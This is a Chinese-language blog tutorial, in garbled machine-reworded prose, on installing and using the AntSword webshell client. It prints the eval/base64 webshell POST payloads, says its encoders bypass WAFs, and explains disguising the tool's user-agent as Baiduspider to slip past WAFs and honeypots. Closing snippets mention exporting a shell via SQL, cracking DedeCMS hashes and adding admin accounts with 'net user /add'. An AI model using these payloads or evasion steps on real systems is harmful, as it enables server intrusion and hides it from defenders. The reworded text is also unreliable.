中国蚁剑是一款开源系统的混合开发网址可视化工具,它关键朝向于合理合法受权的网站渗透测试安全性工作人员及其开展基本实际操作的系统管理员。
通俗化的讲:中国蚁剑是 一 款比水果刀还牛的shell操纵端手机软件。
中国蚁剑青睐模块化设计的开发设计观念,遵照开源系统,就需要开得好看的标准,着眼于为不一样层级的群体出示最简单易懂、便捷立即的编码展现以及改动表明,勤奋让大伙儿能够一起为这一新项目奉献出有意义的事的一点一滴,让这个专用工具真实能让大伙儿用得顺意、舒服,让它能为大伙儿使出出最个性化最合适你的工作能力!
唯一官方网github下载链接:https://github.com/AntSwordProject/
留意:我们下载的情况下必须免费下载2个一部分,一个是新项目关键源代码”antSword“,另一个是加载器;加载器则分成三个版本号:Mac、Windows、Linux。
因为我下载的是“AntSword-Loader-v4.0.3-win32-x64.zip”,我也以Windows版本号64位来实例了。
1、大家缓解压力“AntSword-Loader-v4.0.3-win32-x64.zip”后,双击鼠标“AntSword.exe”;
之一次安裝新项目必须先复位,假如你早已安装了关键源代码,就挑选新项目源代码的文件夹名称。(假如只安装了加载器,挑选一个空文件夹名称,加载器会全自动帮你下载关键新项目源代码)。
留意:这一新项目文件夹名称是你之后必须备份数据的,储存着你的shell和shell内的材料。
2、等复位进行后,再双击鼠标“AntSword.exe”就可以一切正常起动!
应用实际上跟水果刀基本上类似,仅仅蚁剑作用更强劲一些,下边就简易给大伙说说:
1、加上一个shell
更先:右键单击 - 加上数据信息;
次之:键入URL详细地址,联接登陆密码及其编号设定。PHP語言强烈推荐在线编辑器应用chr数据加密;
再度:假如必须自身写伺服电机的数据加密种类,能够按下面的图来实际操作:
从次:还能够配备shell的恳求信息内容和post內容;
2、软件
中国蚁剑有一个软件销售市场,能够安裝一些软件,软件有很多。下列是部分软件截屏:
3、有关伺服电机
伺服电机是这一程序流程的独到之处,用伺服电机数据加密能够轻轻松松绕开WAF。
何不,大家来比照一下默认设置不应用编号传送和base64编号传送的差别:
密文传送,post內容为:
[email protected]_set("display_errors", "0");@set_time_limit(0);echo "3e231";$D=dirname($_SERVER["SCRIPT_FILENAME"]);if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);$R="{$D} ";if(substr($D,0,1)!="/"){foreach(range("C","Z")as $L)if(is_dir("{$L}:"))$R.="{$L}:";}else{$R.="/";}$R.=" ";$u=(function_exists("posix_getegid"))[email protected]_getpwuid(@posix_geteuid()):"";$s=($u)?$u["name"]:@get_current_user();$R.=php_uname();$R.=" {$s}";echo $R;;echo "8e51f";die();
base64数据加密,post內容为:
_0x4ee8506e59871=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwgIjAiKTtAc2V0X3RpbWVfbGltaXQoMCk7ZWNobyAiNzk1ODAiOyREPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTtpZigkRD09IiIpJEQ9ZGlybmFtZSgkX1NFUlZFUlsiUEFUSF9UUkFOU0xBVEVEIl0pOyRSPSJ7JER9CSI7aWYoc3Vic3RyKCRELDAsMSkhPSIvIil7Zm9yZWFjaChyYW5nZSgiQyIsIloiKWFzICRMKWlmKGlzX2RpcigieyRMfToiKSkkUi49InskTH06Ijt9ZWxzZXskUi49Ii8iO30kUi49IgkiOyR1PShmdW5jdGlvbl9leGlzdHMoInBvc2l4X2dldGVnaWQiKSk/QHBvc2l4X2dldHB3dWlkKEBwb3NpeF9nZXRldWlkKCkpOiIiOyRzPSgkdSk/JHVbIm5hbWUiXTpAZ2V0X2N1cnJlbnRfdXNlcigpOyRSLj1waHBfdW5hbWUoKTskUi49Igl7JHN9IjtlY2hvICRSOztlY2hvICIwOWE3ZSI7ZGllKCk7&[email protected](@base64_decode($_POST[_0x4ee8506e59871]));
留意:在其中,ant主要参数名字是shell登陆密码。
再讨论一下chr编号传送,彻底就所有编号了。
4、user-agent改动
要留意的是,手机软件默认设置的user-agent是:User-Agent: antSword/v2.0;并且绝大多数人都不容易去自定useragent,这就给waf和蜜獾白白的送了一个特点,因此我们要改动一下源码:
改动新项目相对路径:
antSword\modules\request.js (改动const USER_AGENT = 'antSword/v2.1'; 这一行编码!)
antSword\modules\update.js (有多处要改动;可检索“antSword/v2.0”来寻找这二行编码!)
我这里是把antSword/v2.0或antSword/v2.1改动以便Baiduspider-image,我改为了百度图片搜索引擎蜘蛛;
假如大伙儿有没有什么不明白的,请查询汉语使用说明:https://doc.u0u.us/zh-hans/
DirBuster是什么? DirBuster的关键目地是找寻掩藏的文件目录和Web服务端网页页面。房地产商有时候会离去贴近但未连接的网页页面;这一专用工具来发觉这种潜在性的系统漏洞。这是一个jav...
首先用暴路径漏洞找到绝对路径,然后替换下面的路径 随便选个数据库,然后执行以下的sql(利用sql命令导出一个shell) Create TABLE a (cmd text NOT N...
解密:织梦密码是cmd5加密,为20位,去掉前三位与后一位。 后台:默认的是dede/login.php 有时后台也可以利用http://chncto.com/include/fcke...
360功能多,现在大多管理员图省事喜欢安个360。360有个防黑加固功能比较坑爹,提权的时候经常会用到net user xxx xxx /add&net localgroup xxx xx...
今日,有一位网民问了我一个难题,他自己早已拥有网址了,如今他想制成“镜像劫持”这类网址,要是开启它,电脑上就会有将会感柒木马程序。 木马病毒是必须开启才有实际效果的,开启标准:要不蒙骗...
什么叫Ngrep? 这一专用工具 - ngrep - (它是“互联网Grep”的联接)是一个在cmd中工作中的互联网数据文件解析器,它取决于pcap库和GNU regex库。ngrep与tcpdum...